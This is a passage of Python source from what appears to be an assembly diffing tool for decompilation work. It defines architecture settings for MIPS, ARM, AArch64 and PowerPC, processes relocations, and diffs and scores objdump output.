"gt",
"le",
"al",
}
ARM32_SUFFIXES = {"", ".n", ".w"}
ARM32_BRANCH_INSTRUCTIONS = {
f"{prefix}{cond}{suffix}"
for prefix in ARM32_PREFIXES
for cond in ARM32_CONDS
for suffix in ARM32_SUFFIXES
}
AARCH64_BRANCH_INSTRUCTIONS = {
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
name="mips",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*?>"),
re_reg=re.compile(
r"\$?\b(a[0-7]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|kt?[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
delay_slot_instructions=MIPS_BRANCH_INSTRUCTIONS.union({"j", "jal", "jr", "jalr"}),
)
MIPSEL_SETTINGS = replace(MIPS_SETTINGS, name="mipsel", big_endian=False)
ARM32_SETTINGS = ArchSettings(
name="arm32",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# Includes:
# - General purpose registers: r0..13
# - Frame pointer registers: lr (r14), pc (r15)
# - VFP/NEON registers: s0..31, d0..31, q0..15, fpscr, fpexc, fpsid
# SP should not be in this list.
re_reg=re.compile(
r"\$?\b([rq][0-9]|[rq]1[0-5]|pc|lr|[ds][12]?[0-9]|[ds]3[01]|fp(scr|exc|sid))\b"
),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=ARM32_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=ARM32_BRANCH_INSTRUCTIONS.union({"adr"}),
difference_normalizer=DifferenceNormalizerARM32,
)
AARCH64_SETTINGS = ArchSettings(
name="aarch64",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [DSHQ]0..31
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([dshq][12]?[0-9]|[dshq]3[01]|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"bl", "adrp"}),
difference_normalizer=DifferenceNormalizerAArch64,
)
PPC_SETTINGS = ArchSettings(
name="ppc",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
)
ARCH_SETTINGS = [
MIPS_SETTINGS,
MIPSEL_SETTINGS,
ARM32_SETTINGS,
AARCH64_SETTINGS,
PPC_SETTINGS,
]
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
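# Illustrative example: "lw\t$a0,16(s8)" is split into
# ("lw\t$a0,", "16", "(s8)").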
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
def process_mips_reloc(row: str, prev: str, arch: ArchSettings) -> str:
if "R_MIPS_NONE" in row:
# GNU as emits no-op relocations immediately after real ones when
# assembling with -mabi=64. Return without trying to parse 'imm' as an
# integer.
return prev
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
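# Hypothetical example: prev = "addiu\t$a0,$a0,0x10" with an R_MIPS_LO16
# relocation against "sym" becomes "addiu\t$a0,$a0,%lo(sym+0x10)".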
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
def process_ppc_reloc(row: str, prev: str) -> str:
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
def process_arm_reloc(row: str, prev: str, arch: ArchSettings) -> str:
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
return before + repl + after
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
scorable_line: str
line_num: Optional[int] = None
branch_target: Optional[int] = None
source_filename: Optional[str] = None
source_line_num: Optional[int] = None
source_lines: List[str] = field(default_factory=list)
comment: Optional[str] = None
def process(dump: str, config: Config) -> List[Line]:
arch = config.arch
normalizer = arch.difference_normalizer(config)
skip_next = False
source_lines = []
source_filename = None
source_line_num = None
i = 0
num_instr = 0
data_refs: Dict[int, Dict[str, List[int]]] = defaultdict(lambda: defaultdict(list))
output: List[Line] = []
stop_after_delay_slot = False
lines = dump.split("\n")
while i < len(lines):
row = lines[i]
i += 1
if not row:
continue
if re.match(r"^[0-9a-f]+ <.*>:$", row):
continue
if row.startswith("DATAREF"):
parts = row.split(" ", 3)
text_offset = int(parts[1])
from_offset = int(parts[2])
from_section = parts[3]
data_refs[text_offset][from_section].append(from_offset)
continue
if config.diff_obj and num_instr >= config.max_function_size_lines:
output.append(
Line(
mnemonic="...",
diff_row="...",
original="...",
normalized_original="...",
scorable_line="...",
)
)
break
if not re.match(r"^ +[0-9a-f]+:\t", row):
# This regex is conservative, and assumes the file path does not contain "weird"
# characters like colons, tabs, or angle brackets.
if re.match(
r"^[^ \t<>:][^\t<>:]*:[0-9]+( \(discriminator [0-9]+\))?$", row
):
source_filename, _, tail = row.rpartition(":")
source_line_num = int(tail.partition(" ")[0])
source_lines.append(row)
continue
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = eval_line_num(tabs[0].strip())
if line_num in data_refs:
refs = data_refs[line_num]
ref_str = "; ".join(
section_name + "+" + ",".join(hex(off) for off in offs)
for section_name, offs in refs.items()
)
output.append(
Line(
mnemonic="<data-ref>",
diff_row="<data-ref>",
original=ref_str,
normalized_original=ref_str,
scorable_line="<data-ref>",
)
)
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
# Let 'original' be 'row' with relocations applied, while we continue
# transforming 'row' into a coarser version that ignores registers and
# immediates.
original = row
while i < len(lines):
reloc_row = lines[i]
if "R_AARCH64_" in reloc_row:
# TODO: handle relocation
pass
elif "R_MIPS_" in reloc_row:
original = process_mips_reloc(reloc_row, original, arch)
elif "R_PPC_" in reloc_row:
original = process_ppc_reloc(reloc_row, original)
elif "R_ARM_" in reloc_row:
original = process_arm_reloc(reloc_row, original, arch)
else:
break
i += 1
normalized_original = normalizer.normalize(mnemonic, original)
scorable_line = normalized_original
if not config.score_stack_differences:
scorable_line = re.sub(arch.re_sprel, "addr(sp)", scorable_line)
if mnemonic in arch.branch_instructions:
# Replace the final argument with "<target>"
scorable_line = re.sub(r"[^, \t]+$", "<target>", scorable_line)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
scorable_line = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_address(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
branch_target = int(row_parts[1].strip().split(",")[-1], 16)
if mnemonic in arch.branch_likely_instructions:
branch_target -= 4
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
scorable_line=scorable_line,
line_num=line_num,
branch_target=branch_target,
source_filename=source_filename,
source_line_num=source_line_num,
source_lines=source_lines,
comment=comment,
)
)
num_instr += 1
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def imm_matches_everything(row: str, arch: ArchSettings) -> bool:
# (this should probably be arch-specific)
return "(." in row
def split_off_address(line: str) -> Tuple[str, str]:
"""Split e.g. 'beqz $r0,1f0' into 'beqz $r0,' and '1f0'."""
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
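# For example, remap(["lw", "nop", "lw"]) (defined below) would yield
# "\x00\x01\x00": each distinct mnemonic maps to a unique one-character code.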
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein
ret: List[Tuple[str, int, int, int, int]] = Levenshtein.opcodes(rem1, rem2)
return ret
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
def score_diff_lines(
lines: List[Tuple[Optional[Line], Optional[Line]]], config: Config
) -> int:
# This logic is copied from `scorer.py` from the decomp permuter project
# https://github.com/simonlindholm/decomp-permuter/blob/main/src/scorer.py
score = 0
deletions = []
insertions = []
def lo_hi_match(old: str, new: str) -> bool:
# TODO: Make this arch-independent, like `imm_matches_everything()`
old_lo = old.find("%lo")
old_hi = old.find("%hi")
new_lo = new.find("%lo")
new_hi = new.find("%hi")
if old_lo != -1 and new_lo != -1:
old_idx = old_lo
new_idx = new_lo
elif old_hi != -1 and new_hi != -1:
old_idx = old_hi
new_idx = new_hi
else:
return False
if old[:old_idx] != new[:new_idx]:
return False
old_inner = old[old_idx + 4 : -1]
new_inner = new[new_idx + 4 : -1]
return old_inner.startswith(".") or new_inner.startswith(".")
def diff_sameline(old: str, new: str) -> None:
nonlocal score
if old == new:
return
if lo_hi_match(old, new):
return
ignore_last_field = False
if config.score_stack_differences:
oldsp = re.search(config.arch.re_sprel, old)
newsp = re.search(config.arch.re_sprel, new)
if oldsp and newsp:
oldrel = int(oldsp.group(1) or "0", 0)
newrel = int(newsp.group(1) or "0", 0)
score += abs(oldrel - newrel) * config.penalty_stackdiff
ignore_last_field = True
# Probably regalloc difference, or signed vs unsigned
# Compare each field in order
newfields, oldfields = new.split(","), old.split(",")
if ignore_last_field:
newfields = newfields[:-1]
oldfields = oldfields[:-1]
for nf, of in zip(newfields, oldfields):
if nf != of:
score += config.penalty_regalloc
# Penalize any extra fields
score += abs(len(newfields) - len(oldfields)) * config.penalty_regalloc
def diff_insert(line: str) -> None:
# Reordering or totally different codegen.
# Defer this until later when we can tell.
insertions.append(line)
def diff_delete(line: str) -> None:
deletions.append(line)
# Find the end of the last long streak of matching mnemonics, if it looks
# like the objdump output was truncated. This is used to skip scoring
# misaligned lines at the end of the diff.
last_mismatch = -1
max_index = None
lines_were_truncated = False
for index, (line1, line2) in enumerate(lines):
if (line1 and line1.original == "...") or (line2 and line2.original == "..."):
lines_were_truncated = True
if line1 and line2 and line1.mnemonic == line2.mnemonic:
if index - last_mismatch >= 50:
max_index = index
else:
last_mismatch = index
if not lines_were_truncated:
max_index = None
for index, (line1, line2) in enumerate(lines):
if max_index is not None and index > max_index:
break
if line1 and line2 and line1.mnemonic == line2.mnemonic:
diff_sameline(line1.scorable_line, line2.scorable_line)
else:
if line1:
diff_delete(line1.scorable_line)
if line2:
diff_insert(line2.scorable_line)
insertions_co = Counter(insertions)
deletions_co = Counter(deletions)
for item in insertions_co + deletions_co:
ins = insertions_co[item]
dels = deletions_co[item]
common = min(ins, dels)
score += (
(ins - common) * config.penalty_insertion
+ (dels - common) * config.penalty_deletion
+ config.penalty_reordering * common
)
return score
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
boring: bool = field(compare=False)
is_data_ref: bool = field(compare=False)
line1: Optional[Line] = field(compare=False)
line2: Optional[Line] = field(compare=False)
@dataclass(frozen=True)
class Diff:
lines: List[OutputLine]
score: int
max_score: int
def trim_nops(lines: List[Line], arch: ArchSettings) -> List[Line]:
lines = lines[:]
while lines and lines[-1].mnemonic == "nop" and (len(lines) == 1 or lines[-2].mnemonic not in arch.delay_slot_instructions):
lines.pop()
return lines
def do_diff(lines1: List[Line], lines2: List[Line], config: Config) -> Diff:
if config.show_source:
import cxxfilt
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[int] = set()
bts2: Set[int] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
btset.add(bt)
sc(str(bt))
lines1 = trim_nops(lines1, arch)
lines2 = trim_nops(lines2, arch)
diffed_lines = diff_lines(lines1, lines2, config.algorithm)
score = score_diff_lines(diffed_lines, config)
max_score = len(lines1) * config.penalty_deletion
line_num_base = -1
line_num_offset = 0
line_num_2to1 = {}
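# Map each line number in the current (right-hand) dump to the nearest preceding
# base line number plus an offset, so branch targets can later be compared
# across the two columns.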
for (line1, line2) in diffed_lines:
if line1 is not None and line1.line_num is not None:
line_num_base = line1.line_num
line_num_offset = 0
else:
line_num_offset += 1
if line2 is not None and line2.line_num is not None:
line_num_2to1[line2.line_num] = (line_num_base, line_num_offset)
for (line1, line2) in diffed_lines:
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
is_data_ref = False
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.diff_row == "<data-ref>":
if line1.normalized_original != line2.normalized_original:
line_prefix = "i"
sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(sym_color)
out2 = out2.reformat(sym_color)
is_data_ref = True
elif (
line1.normalized_original == line2.normalized_original
and line2.branch_target is None
):
# Fast path: no coloring needed. We don't include branch instructions
# in this case because we need to check that their targets line up in
# the diff, and don't just happen to have the same address
# by accident.
pass
elif line1.diff_row == "<delay-slot>":
# Don't draw attention to differing branch-likely delay slots: they
# typically mirror the branch destination - 1 so the real difference
# is elsewhere. Still, do mark them as different to avoid confusion.
# No need to consider branches because delay slots can't branch.
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branchless1, address1 = out1.plain(), ""
branchless2, address2 = out2.plain(), ""
if mnemonic in arch.instructions_with_address_immediates:
branchless1, address1 = split_off_address(branchless1)
branchless2, address2 = split_off_address(branchless2)
out1 = Text(branchless1)
out2 = Text(branchless2)
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
if line2.branch_target is not None:
target = line2.branch_target
line2_target = line_num_2to1.get(line2.branch_target)
if line2_target is None:
# If the target is outside the disassembly, extrapolate.
# This only matters near the bottom.
assert line2.line_num is not None
line2_line = line_num_2to1[line2.line_num]
line2_target = (line2_line[0] + (target - line2.line_num), 0)
# Set the key for three-way diffing to a normalized version.
norm2, norm_branch2 = split_off_address(line2.normalized_original)
if norm_branch2 != "<ign>":
line2.normalized_original = norm2 + str(line2_target)
same_target = line2_target == (line1.branch_target, 0)
else:
# Do a naive comparison for non-branches (e.g. function calls).
same_target = address1 == address2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if imm_matches_everything(branchless2, arch):
# ignore differences due to %lo(.rodata + ...) vs symbol
out1 = out1.reformat(BasicFormat.NONE)
out2 = out2.reformat(BasicFormat.NONE)
elif line2.branch_target is not None and same_target:
# same-target branch, don't color
pass
else:
# must have an imm difference (or else we would have hit the
# fast path)
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# reg differences and maybe imm as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
if same_target:
address_imm_fmt = BasicFormat.NONE
else:
address_imm_fmt = BasicFormat.IMMEDIATE
out1 += Text(address1, address_imm_fmt)
out2 += Text(address2, address_imm_fmt)
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.show_source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[int],
sc: FormatFunction,
) -> Optional[Text]:
if line is None:
return None
if line.line_num is None:
return out
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(str(line.line_num)))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(str(line.branch_target)))
formatted_line_num = Text(hex(line.line_num)[2:] + ":", line_color)
return formatted_line_num + " " + in_arrow + " " + out + out_arrow
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
if config.show_source and line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(r".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
padding = " " * 7 if config.show_line_numbers else " " * 2
output.append(
OutputLine(
base=None,
fmt2=padding + Text(source_line, line_format),
key2=source_line,
boring=True,
is_data_ref=False,
line1=None,
line2=None,
)
)
key2 = line2.normalized_original if line2 else None
boring = False
if line_prefix == " ":
boring = True
elif config.compress and config.compress.same_instr and line_prefix in "irs":
boring = True
if config.show_line_numbers:
if line2 and line2.source_line_num is not None:
num_color = (
BasicFormat.SOURCE_LINE_NUM
if sym_color == BasicFormat.NONE
else sym_color
)
num2 = Text(f"{line2.source_line_num:5}", num_color)
else:
num2 = Text(" " * 5)
else:
num2 = Text()
fmt2 = Text(line_prefix, sym_color) + num2 + " " + (part2 or Text())
output.append(
OutputLine(
base=part1,
fmt2=fmt2,
key2=key2,
boring=boring,
is_data_ref=is_data_ref,
line1=line1,
line2=line2,
)
)
output = output[config.skip_lines :]
return Diff(lines=output, score=score, max_score=max_score)
def chunk_diff_lines(
diff: List[OutputLine],
) -> List[Union[List[OutputLine], OutputLine]]:
"""Chunk a diff into an alternating list like A B A B ... A, where:
* A is a List[OutputLine] of insertions,
* B is a single non-insertion OutputLine, with .base != None."""
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
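# Sketch of the chunk shape produced above (illustrative, with made-up OutputLines):
# given diff = [ins1, ins2, baseA, baseB, ins3], where the ins* lines have .base == None,
# chunk_diff_lines(diff) == [[ins1, ins2], baseA, [], baseB, [ins3]]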
def compress_matching(
li: List[Tuple[OutputLine, ...]], context: int
) -> List[Tuple[OutputLine, ...]]:
ret: List[Tuple[OutputLine, ...]] = []
matching_streak: List[Tuple[OutputLine, ...]] = []
context = max(context, 0)
def flush_matching() -> None:
if len(matching_streak) <= 2 * context + 1:
ret.extend(matching_streak)
else:
ret.extend(matching_streak[:context])
skipped = len(matching_streak) - 2 * context
filler = OutputLine(
base=Text(f"<{skipped} lines>", BasicFormat.SOURCE_OTHER),
fmt2=Text(),
key2=None,
boring=False,
is_data_ref=False,
line1=None,
line2=None,
)
columns = len(matching_streak[0])
ret.append(tuple([filler] * columns))
if context > 0:
ret.extend(matching_streak[-context:])
matching_streak.clear()
for line in li:
if line[0].boring:
matching_streak.append(line)
else:
flush_matching()
ret.append(line)
flush_matching()
return ret
def align_diffs(
old_diff: Diff, new_diff: Diff, config: Config
) -> Tuple[TableMetadata, List[Tuple[OutputLine, ...]]]:
meta: TableMetadata
diff_lines: List[Tuple[OutputLine, ...]]
padding = " " * 7 if config.show_line_numbers else " " * 2
if config.threeway:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
Text(f"{padding}PREVIOUS ({old_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=old_diff.score,
)
old_chunks = chunk_diff_lines(old_diff.lines)
new_chunks = chunk_diff_lines(new_diff.lines)
diff_lines = []
empty = OutputLine(Text(), Text(), None, True, False, None, None)
assert len(old_chunks) == len(new_chunks), "same target"
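# Both diffs were produced against the same target dump, so their non-insertion
# (base) lines, and therefore the chunk boundaries, match one-to-one.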
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(
a=old_chunk, b=new_chunk, autojunk=False
)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
diff_lines.append((empty, new_chunk[j], old_chunk[i]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
diff_lines.append((empty, new_chunk[j], empty))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
diff_lines.append((empty, empty, old_chunk[i]))
else:
assert isinstance(new_chunk, OutputLine)
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
diff_lines.append((new_chunk, new_chunk, old_chunk))
diff_lines = [
(base, new, old if old != new else empty) for base, new, old in diff_lines
]
else:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=None,
)
diff_lines = [(line, line) for line in new_diff.lines]
if config.compress:
diff_lines = compress_matching(diff_lines, config.compress.context)
return meta, diff_lines
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events
import watchdog.observers
class WatchEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
